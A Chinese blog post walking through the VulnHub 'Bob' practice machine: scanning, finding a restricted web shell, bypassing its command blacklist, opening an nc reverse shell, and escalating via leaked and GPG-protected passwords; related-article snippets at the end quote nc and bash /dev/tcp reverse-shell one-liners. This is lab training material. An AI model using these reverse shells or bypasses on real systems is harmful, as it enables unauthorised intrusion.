暴打bob靶机

最新推荐文章于 2024-02-12 16:31:17 发布
最新推荐文章于 2024-02-12 16:31:17 发布
阅读量3.5k 收藏 1
点赞数 2
分类专栏: 暴打靶机 文章标签: pycharm 靶机 kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41263192/article/details/120096421
版权

实验环境:

kali:192.168.126.130
bob靶机:192.168.126.129

一、信息收集

扫描目标ip地址

在这里插入图片描述 扫描目标主机的端口在这里插入图片描述发现有80端口,尝试登录网页查看在这里插入图片描述在网页中查找到了相关信息
大意是,学校网站被黑客攻击,之后将不能登录网站之类的。
在这里插入图片描述在网站的联系我们中找到了关键词:admin,所以推测bob J有可能是管理员
在这里插入图片描述扫描网站的目录,继续查看网站的其他子目录在这里插入图片描述这里只有状态码为200的网页才可以正常查看
查看robots.txt 目录,发现其下的隐藏目录
在这里插入图片描述

二、getshell

继续查看隐藏目录
又发现了bob,大概率是管理员用户,并且提示有个webshell在运行,但是应该是安全的,所以可能有些命令无法运行

在这里插入图片描述在这里插入图片描述在shell页面中可以执行一些简单的命令,这里尝试用bp工具
在这里插入图片描述网页开启代理
在这里插入图片描述bp工具添加代理
在这里插入图片描述双方都开启代理后,在shell网页中提交命令
在这里插入图片描述bp拦截网页的提交请求,我们要将拦截下来的网页发送到repeater中去
在这里插入图片描述尝试绕过发现目录中有备份文件(图片这里是打错字了=_=)
/bin/ls
在这里插入图片描述访问该备份文件
在这里插入图片描述下载后查看该文件后找到了shell运行命令的黑名单
在这里插入图片描述发现其中的nc被拒绝使用,说明nc可以在本次渗透中有用处,其实nc在本次的渗透中是用来做反弹shell的,尝试绕过
在kali中开启监听端口
kali端口在靶机中绕过,并通过端口向kali发送bash
靶机端口kali成功连接到靶机中
连接成功由于这个界面使用起来不方便,这里使用了一个python的模块,进入到交互式bash中

python -c "import pty;pty.spawn('/bin/bash')"

bash

三、提权

查看根目录中的文件,发现flag.txt文件,由于该文件只有管理员的权限才能打开,所以我们现在要开始提权
在这里插入图片描述在这里插入图片描述查看用户文件,发现bob和jc两个用户
在这里插入图片描述进入到bob用户的家目录查看有无可用信息

cd /home/bob
	ls -lah

发现敏感文件
在这里插入图片描述在这里插入图片描述查看旧密码文件

cat .old_passwordfile.html

发现了登录jc用户的密码
在这里插入图片描述进入到Documents中
在这里插入图片描述查看到login是加密文件,尝试查找其他文件寻找有效信息
最后在/homr/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here中查到有效信息
在这里插入图片描述是一首藏头诗,每行的首字母就是gpg的密码,解密完成后发现了bob的密码
在这里插入图片描述登录bob用户
在这里插入图片描述查看flag.txt文件在这里插入图片描述在我看来,这个靶机的核心知识点在于那个webshell的绕过和nc监听端口获得shell的过程,对于我来说是没有接触过的知识点。
总体来说这个靶机并不难,熟练运用各种工具就能顺利通关了

奶酪酥
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透入门之BOB靶机渗透实战
CongM_JueD的博客
09-03 767
渗透入门初体验
bob靶机
weixin_52963334的博客
08-14 86
bob靶机实操
Bob靶机游玩体验
WULI_KK的博客
01-08 245
这是一个十分好玩有趣且难度不高的渗透靶机拿取flag。
Vulnhub靶机 bob
菜浪马废的博客
04-28 237
一个用户名bob 一个提示:运行了webshell 尝试id 有回显 抓包看一下 /bin/nc 192.168.0.128 443 -e /bin/sh 给了个账号 ssh登录 爆破文件 给了bob的账号
靶机渗透之BOb1
最新发布
2301_76227305的博客
02-12 933
反弹shell命令的使用解密命令的使用在这里理清一下用户这个玩意,一开始我们进入到home目录里面发现有三个用户。但现在我们是没有身份的,只能看一下普通的文件和执行一些普通的命令,这也是为啥我们一开始执行解密命令没权限。但我们发现jc用户的密码,登录jc用户获取身份了。那我们便就可以执行解密的命令,然后获取bob的密码。最后登录bob用户,发现bob用户在root组里面,可以变成root用户。那为啥jc不能变成root用户呢,因为它不在root组里面。
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
PWN靶机环境 网络安全
05-23
PWN靶机环境
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
Bob靶机攻击记录
m0_56375711的博客
08-13 266
bob靶机攻占记录~
BOB靶机渗透实战-----攻略(大神勿喷)
z2560088的博客
09-21 1690
准备工作 靶场 Bob: 1.0.1 ~ VulnHub 攻击工具kali虚拟机 直接双击打开即可添加到虚拟机。打开后网卡使用NAT模式。 没有给用户名和密码。(给了就没有攻击的必要了 hhh) 开始攻击 打开kali 使用nmap 扫描同网段下的ip和端口(因为靶机也用的NAT模式的网卡,所以按理说应该被分在了与kali虚拟机同网段的某一个ip地址) 我的kali ip 地址为192.168.160.129 nmap -sP 192.168.160.0/24 ...
Vulnhub靶机Bob_v1.0.1 writeup
xingjinhao123的博客
02-18 2932
下载地址:https://www.vulnhub.com/entry/bob-101,226/ 信息搜集 扫描IP地址 扫描端口及端口信息 访问80端口并没有发现有用的信息 扫描目录 看到有熟悉的robots.txt,访问看一下 发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 getshell bash反弹shell bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 &
vulnhub靶场,Bob_v1.0.1
m0_63755076的博客
09-27 393
但是发现好像没有读取成功,可能是这个命令解释器的问题,使用python生成一个交互式的shell再次查看。发现里面有jc用户和seb用户的密码,先不适用ssh进行连接,看看他们的家目录里面有什么。说什么ftp的后门,也没搞懂他说的的意思,还有一个gpg文件,但是想要解密就需要拿到密钥。发现是一个学校的官网,查看一下基本内容发现没有什么发现,大概的内容就是学校的网站被黑了。分别访问这几个页面看看都有什么发现,当我们访问这个页面的时候,发现可能是一个命令行。成功获得bob用户的密码,切换为bob用户。
实验六 Bob渗透
m0_56948411的博客
12-03 6908
实验六 Bob渗透一、实验目的1. 通过对目标靶机的渗透过程,熟悉网络扫描、代码审计、权限提升、Linux中文件命令的使用和提高对信息挖掘的能力。二、实验环境攻击工具:kali虚拟机(10.24.231.60)靶场:Bob:1.0.1~VulnHub三、实验原理找到初始信息,比如一个ip地址或者一个域名;找到网络地址范围,或者子网掩码,找到开发端口和入口点,弄清每个端口运行哪种服务,找到目标存在的漏洞;找到账号密码从而提高权限获取最终胜利。四、实验过程及分析(一)信息收集如图1-1,1-2,使用nmap扫描
forms身份验证
carlbiao
01-12 1617
在发出登录请求时,需要在网页上填写一个表单并将该表单提交到服务器。服务器在接受该请求之后,讲向用户的本地机器写一个cookie(是当你访问某个站点时,随某个HTML网页发送到你的浏览器中的一小段信息)送回服务器,这样用户就可以根据自己的希望保持身份验证状态。例如:1、用户,假如是Bob。希望查看页面A,匿名用户不可以访问这个页面,因此当Bob试图访问页面A是,浏览器取而代之显示一个登陆页面
公钥方式登录远程服务器
gao_bob的博客
12-18 2618
公钥方式登录远程服务器
利用ASP.NET框架创建网站登陆
zsybob的专栏
06-09 2158
1、关于登陆验证和授权    很多网站都有登陆对话框,让事先已经注册的用户验证,以便为他们提供个性化的服务等。可以把这个过程看作是两件事情的发生:验证和授权!登陆的作用是验证请求登陆的用户是否合法,而授权则是验证合法的用户在请求资源时,根据他们的权限决定是访问还是拒绝。    以上这种网站本身提供对话框的作法在.NET中被称之为Forms验证模式,接下来将会讲述这种验证模式。在以前ASP陈序员或者
android 弹窗_什么便签备忘录软件横跨Windows、iOS和Android
weixin_39992417的博客
11-03 476
原标题:什么便签备忘录软件横跨Windows、iOS和Android互联网时代的今天,大家对手机和电脑都不陌生。电脑的话,常见的就是Windows电脑。因为它上面自带Office办公软件,另外平台的开放性也很好:在它上面除了办公外,还可以开展看电影、玩游戏等娱乐活动。而手机的话,就不同了。现在的手机基本上分为两大阵营:苹果和安卓阵营。当然了,每个人的品位不同,喜欢的操作系统也不同;有喜欢安卓的,也...
doubletrouble靶机
08-29
doubletrouble靶机是一个用于渗透测试和漏洞挖掘的目标。它有两个不同的靶机地址。第一个地址是https://download.vulnhub.com/doubletrouble/doubletrouble.ova,可以下载一个ova文件来部署虚拟机。第二个地址是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值